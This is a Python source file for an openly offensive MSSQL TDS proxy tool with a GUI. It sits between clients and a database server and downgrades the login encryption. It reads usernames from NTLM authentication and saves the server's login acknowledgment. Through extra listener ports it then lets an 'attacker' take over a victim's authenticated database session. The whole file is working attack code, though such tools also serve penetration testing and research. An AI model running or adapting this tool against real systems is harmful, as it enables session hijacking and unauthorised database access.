#!/usr/bin/pyhton

#The code is released under GPLv2 (http://www.gnu.org/licenses/gpl-2.0.html)
#by Laszlo Toth.
#Use the code at your own responsibility.
#For help and disclaimer please visit:
#  http://www.soonerorlater.hu/index.khtml?article_id=517


import SocketServer
import socket
import sys
from struct import *
import threading
import re
import binascii
from configobj import ConfigObj
from validate import Validator
import array
from Gui2 import *
from wx.lib.pubsub import Publisher
import logging
from ntlm import *
import time

FILTER=''.join([(len(repr(chr(x)))==3) and chr(x) or '.' for x in range(256)])


def hexdump(src, length=8):
	result=[]
	for i in xrange(0, len(src), length):
		s = src[i:i+length]
		hexa = ' '.join(["%02X"%ord(x) for x in s])
		printable = s.translate(FILTER)
		result.append("%04X   %-*s   %s\n" % (i, length*3, hexa, printable))
	return ''.join(result)
	

#Sends the log to the wx gui
class LoggingRedirectHandler(logging.Handler):
	def __init__(self,):
		logging.Handler.__init__(self)

	def emit(self, record):
		msg=self.format(record)
		wx.CallAfter(Publisher().sendMessage, "insertLog", msg)
	


#Storing the connections to display them in the GUI
class Connection:
	def __init__(self,server, srvport, srvversion, 
					client, clntport, clntversion, user, hijackport, gui):
		self.server=server
		self.srvport=srvport
		self.srvversion=srvversion
		self.client=client
		self.clntport=clntport
		self.clntversion=self.versions[clntversion]
		self.user=user
		self.hijacked=False
		self.hijackport=0
		wx.CallAfter(Publisher().sendMessage,"insertData",self)
	
	versions={"\x74":"2012","\x73":"2008","\x72":"2005", "\x07":"That's strange"}
	
	def Hijack(self):
		self.hijacked=True
	
	#There is no return value from the message so we call this from gui class	
	def setIndex(self,index):
		self.index=index
	
	def setHijackPort(self, port):
		self.hijackport=port
		wx.CallAfter(Publisher().sendMessage,"setHijackPort",[self.index, self.hijackport])
	
	def getAsarray(self):
		return [self.server, str(self.srvport), self.srvversion,
			self.client, str(self.clntport), self.clntversion, self.user,
			str(self.hijackport)]
		
class NewClientServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
	#Pass the already opened socket (connection to the MSSQL server) to the handler function
	def setSrvSocket(self,srvSocket):
		self.srvSocket=srvSocket
	
	def setSeq(self,seq):
		self.seq=seq
	
	def setSrvType(self, srvType):
		self.srvType=srvType
	
	def setSrvVer(self, srvVer):
		self.srvVer=srvVer
	
	def setClntType(self, clntType):
		self.clntType=clntType
	
	def setClntVer(self, clntVer):
		self.clntVer=clntVer
		
	def setFirstSrvPacket(self, firstsrvpacket):
		self.firstsrvpacket=firstsrvpacket
	
	def setFromServer(self, fromserver):
		self.fromserver=fromserver
		
	def setFromClient(self, fromclient):
		self.fromclient=fromclient
	
	def setIndex(self,index):
		self.index=index

class NewClient(threading.Thread):

	def __init__(self, seq, socket, atthost, attport, firstsrvpacket, srvType, srvVer, clntType, clntVer):
		self.seq=seq
		self.socket=socket
		self.atthost=atthost
		self.attport=attport
		self.srvType=srvType
		self.clntType=clntType
		self.clntVer=clntVer
		self.srvVer=srvVer
		self.firstsrvpacket=firstsrvpacket
		lh=LoggingRedirectHandler()
		lh.setLevel(logging.DEBUG)
		formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
		lh.setFormatter(formatter)
		self.logger=logging.getLogger("Hijack Thread {0}".format(attport))
		self.logger.setLevel(logging.DEBUG)
		self.logger.addHandler(lh)
		
		
		threading.Thread.__init__(self)
		
	def run(self):
		#print "New hijack thread started, waiting for connection on port {0}!".format(self.attport)
		self.logger.info("New hijack thread started, waiting for connection on port {0}!".format(self.attport))
		srvNewClient =  NewClientServer((self.atthost, self.attport), NewClientHandler)
		srvNewClient.setSrvSocket(self.socket)
		srvNewClient.setSeq(self.seq)
		srvNewClient.setSrvType(self.srvType)
		srvNewClient.setSrvVer(self.srvVer)
		srvNewClient.setClntType(self.clntType)
		srvNewClient.setClntVer(self.clntVer)
		srvNewClient.setFirstSrvPacket(self.firstsrvpacket)
		srvNewClient.setFromClient(None)
		srvNewClient.setFromServer(None)
		srvNewClient.setIndex(0)
		srvNewClient.serve_forever()

class SendReceiveThread(threading.Thread):
	
	def __init__(self, send, receive, who):
		self.send=send
		self.receive=receive
		self.quit=False
		self.who=who
		threading.Thread.__init__(self)
		
	def run(self):
		self.receive.settimeout(1)
		self.send.settimeout(1)
		while(not self.quit):
			try:
				self.header = ""
				self.header=self.receive.recv(8)
				if(self.header==""):
					break
			except:
				#print "timeout server"
				a=1
			if(len(self.header)):
				packet_type, packet_status, packet_length, packet_spid, packet_packet, packet_window = unpack('BBHHBB', self.header)
				packet_length=socket.ntohs(packet_length)
				if(packet_length > 8):
					self.data=""
					buff=""
					while(len(self.data) < packet_length-8):
						try:
							buff=self.receive.recv(packet_length-8-len(self.data))
						except:
							a=1
							if (len(buff)==0):
								break
						self.data=self.data+buff
						buff=""
				else:
					self.data=""
				send=""
				send=self.header+self.data
				sent=self.send.send(send)
				if(sent==0):
					return
				

class NewClientHandler(SocketServer.BaseRequestHandler):
	
	def __init__(self, request, client_address, server):
		lh=LoggingRedirectHandler()
		lh.setLevel(logging.DEBUG)
		formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
		lh.setFormatter(formatter)
		server.index+=1
		self.logger=logging.getLogger("Hijack Thread {0}:{1}".format(server.server_address[1], server.index))
		self.logger.setLevel(logging.DEBUG)
		self.logger.addHandler(lh)
		SocketServer.BaseRequestHandler.__init__(self, request, client_address, server)
	
	def handle(self):
		self.logger.info("{0}:{1} connected to a hijack thread on port {2}!".format(self.client_address[0], str(self.client_address[1]),
																				self.server.server_address[1]))
		
		if(self.server.srvVer.startswith("10.")):
			toprelogin="\x04\x01\x00\x25\x00\x00\x01\x00\x00\x00\x15\x00\x06\x01\x00\x1b\x00\x01\x02\x00\x1c\x00\x01\x03\x00\x1d\x00\x00\xff\x0a\x32\x06\x40\x00\x00\x02\x00"
		elif (self.server.srvVer.startswith("11.")):
			toprelogin="\x04\x01\x00\x25\x00\x00\x01\x00\x00\x00\x15\x00\x06\x01\x00\x1b\x00\x01\x02\x00\x1c\x00\x01\x03\x00\x1d\x00\x00\xff\x0b\x00\x08\x34\x00\x00\x02\x00"
		else:
			toprelogin="\x04\x01\x00\x25\x00\x00\x01\x00\x00\x00\x15\x00\x06\x01\x00\x1b\x00\x01\x02\x00\x1c\x00\x01\x03\x00\x1d\x00\x00\xff\x0b\x00\x08\x34\x00\x00\x02\x00"
		quit=0
		self.srvVer=""
		sock=self.server.srvSocket
		self.request.settimeout(2)
		sock.settimeout(2)
		#Pre-Login package
		self.header = self.request.recv(8)
		packet_type, packet_status, packet_length, packet_spid, packet_packet, packet_window = unpack('BBHHBB', self.header) 
		packet_length=socket.ntohs(packet_length)
		self.data=self.request.recv( packet_length-8)
		self.request.send(toprelogin)
		
		#Login package
		self.header = self.request.recv(8)
		packet_type, packet_status, packet_length, packet_spid, packet_packet, packet_window = unpack('BBHHBB', self.header) 
		packet_length=socket.ntohs(packet_length)
		self.data=self.request.recv( packet_length-8)
		self.request.send(self.server.firstsrvpacket)
		srv_spid = unpack('xx2xHxx', self.server.firstsrvpacket[:8])[0]
		
		#We should stop the previous thread, because it will read the server socket
		#and mess up the communication. Only one fromserver should run.
		if(self.server.fromserver!=None):
			self.server.fromserver.quit=True
			self.server.fromserver.join()
		fromserver=SendReceiveThread(self.request, sock, "fromserver")
		self.server.setFromServer(fromserver)
		if(self.server.fromclient!=None):
			self.server.fromclient.quit=True
			self.server.fromclient.join()
		fromclient=SendReceiveThread(sock, self.request, "fromclient")
		self.server.setFromClient=(fromclient)
		fromserver.start()
		fromclient.start()
		fromserver.join()
		fromclient.join()
	
	
			
class ProxyTDSHandler(SocketServer.BaseRequestHandler):
	
	#Downgrade encryption. The code is based on Patrik Karlsson code for hatkit proxy
	def downEncryption(self,data):
		pos=0
		#if(len(data)!=8):
		#	return data
		while(pos+4 < len(data)):
			option_type, offset, data_len =unpack(">BHH",data[:6])
			#offset=socket.ntohs(offset)
			#Option type id for the encryption type 0x00
			if(option_type==0x00):
				#data[offset+pos+6]=0x02
				data=data[:offset+pos+5]+"\x02"+data[offset+pos+7:]
				break
			pos=pos+5
			
		return data
	
	def checkauthpacketfromsrv(self,data):
		#if(data[0]!=0xaa and data[0]!=0xed):
		if(data[0]=="\xe3"):
			return True
		else:
			return False
		
	def parseloginackpackage(self,data):
		pos=0
		tdsversion=""
		srvversion=""
		while(pos+4 < len(data)):
			option_type,  option_len =unpack("<BH",data[pos:pos+3])
			#Option type id for login acknowledgment
			if(option_type==0xad):
				tdsversion=data[pos+4]
				(major,zero,minor)=unpack("2BH", data[pos+option_len-1:pos+option_len-1+4])
				minor=socket.ntohs(minor)
				srvversion="{0}.{1}.{2}".format(major, zero, minor)
				break
			pos=pos+option_len+3
			
		return (tdsversion, srvversion)
	
	def handle(self):
		quit=0
		firstsrvpacket=0
		newClientCreated=0
		connectionadded=0
		srvversion="srvversion"
		clntversion="clntversion"
		self.user="unknown"
		hijack="Not Yet"
		self.header = self.request.recv(8)
		packet_type, packet_status, packet_length, packet_spid, packet_packet, packet_window = unpack('BBHHBB', self.header)		
		packet_length=socket.ntohs(packet_length)
		self.data=self.request.recv( packet_length-8)
		#If the packet is a PRELOGIN packet, let's switch of the encryption
		if(packet_type==0x12 and downEncryption):
			self.data=self.downEncryption(self.data)
		sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		sock.connect((self.server.SrvHost, self.server.SrvPort))
		send=self.header+self.data
		sock.send(send)
		sock.settimeout(2)
		self.request.settimeout(2)
		
		while(quit==0):
			#From the server
			try:
				self.header = ""
				self.header=sock.recv(8)
				if(self.header==""):
					break
			except:
				#print "timeout server"
				a=1
			if(len(self.header)):
				packet_type, packet_status, packet_length, packet_spid, packet_packet, packet_window = unpack('BBHHBB', self.header)
				packet_length=socket.ntohs(packet_length)
				if(packet_length > 8):
					self.data=sock.recv(packet_length-8)
				else:
					self.data=""
				send=self.header+self.data
				#Save the server response if the auth was successful. Then we save the TDS version and first packet for
				#the hijack attack.  
				if(packet_type==0x04 and firstsrvpacket==0):
					if(self.checkauthpacketfromsrv(self.data)):
						firstsrvpacket=1
						self.firstsrvpacket=self.header+self.data
						self.clntVer,self.srvVer = self.parseloginackpackage(self.data)
				self.request.send(send)
			#From the client
			try:
				self.header = ""
				self.header = self.request.recv(8)
			except:
				a=1
			if(len(self.header)):
				packet_type, packet_status, packet_length, packet_spid, packet_packet, packet_window = unpack('BBHHBB', self.header)
				packet_length=socket.ntohs(packet_length)
				if(packet_length>8):
					self.data=self.request.recv(packet_length-8)
				else:
					self.data=""
				send=self.header+self.data	
				sock.send(send)
			#Add the new connection to the GUI.
			if(firstsrvpacket==1 and connectionadded==0):
				self.server.connections.append(Connection(self.server.SrvHost, str(self.server.SrvPort), self.srvVer,
											self.client_address[0], str(self.client_address[1]), self.clntVer,
											self.user, hijack, self.server.gui))
				self.index=self.server.ccount
				self.server.ccount+=1
				
				connectionadded=1
			#if there is a SSPI response in the client communication, parse the NTLM package
			if(packet_type==0x11):
				(self.user, a, b)=parse_NTLM_AUTHENTICATE_MESSAGE(self.data)
				#wx.CallAfter(Publisher().sendMessage, "setUser", [self.index, self.user])
			#Create the new hijack thread, if the hijack clicked in the GUI
			if(newClient==True and firstsrvpacket==1 and newClientCreated==0 and 
			self.server.connections[self.index].hijacked==True):
				self.request.close()
				quit=1
				newClientCreated=1
				self.server.AttPort=self.server.AttPort+1
				self.server.connections[self.index].setHijackPort(self.server.AttPort)
				
				client=NewClient(0, sock, self.server.AttHost, self.server.AttPort, self.firstsrvpacket, "", self.srvVer, "", "")
				client.start()
				
				
			
		
class ThreadedTDSProxy(SocketServer.ThreadingMixIn, SocketServer.TCPServer):

	# Ctrl-C will cleanly kill all spawned threads
	daemon_threads = True
	# much faster rebinding
	allow_reuse_address = True

	#The proxy  will listen on this address and on this port to accept connections from the victims  
	def setLocalListener(self,LstHost,LstPort):
		self.LstHost=LstHost
		self.LstPort=LstPort

	#The Oracle server IP address and port
	def setRemoteListener(self,SrvHost,SrvPort):
		self.SrvHost=SrvHost
		self.SrvPort=SrvPort
		
	#This will be the address and the first port for the attacker. When an additional victim logs out, the new thread will
	#listen on the AttPort+1  
	def setAttackerListener(self,AttHost, AttPort):
		self.AttHost=AttHost
		self.AttPort=AttPort
		
	def setConnections(self, connections):
		self.connections=connections
		self.ccount=0
		
	def hijack(self, index):
		self.connections[index].hijack()
	
	def setgui(self,gui):
		self.gui=gui

class ProxyThread(threading.Thread):
	
	def __init__(self, server):
		self.server=server
		threading.Thread.__init__ ( self )
	
	def run(self):
		try:
			self.server.serve_forever()
		except KeyboardInterrupt:
			print "\nCtrl-C detected, exiting...\n"
			sys.exit(0)	



if __name__ == "__main__":
	LstHost, LstPort = "", 1433
	configfile=""

	if len(sys.argv)==1:
		configfile="tdsp.cfg"
	else:
		configfile=sys.argv[1]
	
	config=ConfigObj(configfile, configspec='tdsp.cfs')
	validator = Validator()
	res=config.validate(validator)
	
	
	#The listening IP address, empty means on all interfaces
	LstHost=config['LstHost']
	#The listening port
	LstPort=config['LstPort']
	#Proxying the connecting client to this server
	SrvHost=config['SrvHost']
	#Proxying the connecting client to this port
	SrvPort=config['SrvPort']
	#When hijacking happens, accept the connection on this IP, empty means
	#on all interfaces
	AttHost=config['AttHost']
	#When hijacking happens, accept the connection on this port. When more
	#hijacking happens the port number is increased by one.
	AttPort=config['AttPort']
	#Start new client, for hijack
	newClient=config['newClient']
	#Login encryption downgrade
	downEncryption=config['downEncryption']
	

	
	server = ThreadedTDSProxy((LstHost, LstPort), ProxyTDSHandler)
	server.setLocalListener(LstHost, LstPort)
	server.setRemoteListener(SrvHost, SrvPort)
	server.setAttackerListener(AttHost, AttPort)
	connections=[]
	server.setConnections(connections)
	
	ProxyThread(server).start()
	
	app = wx.App()
	gui=ConnectionList(None, -1, 'Connections', server)
	server.setgui(gui)
	app.MainLoop()
	
	server.shutdown()
	
	
	


	
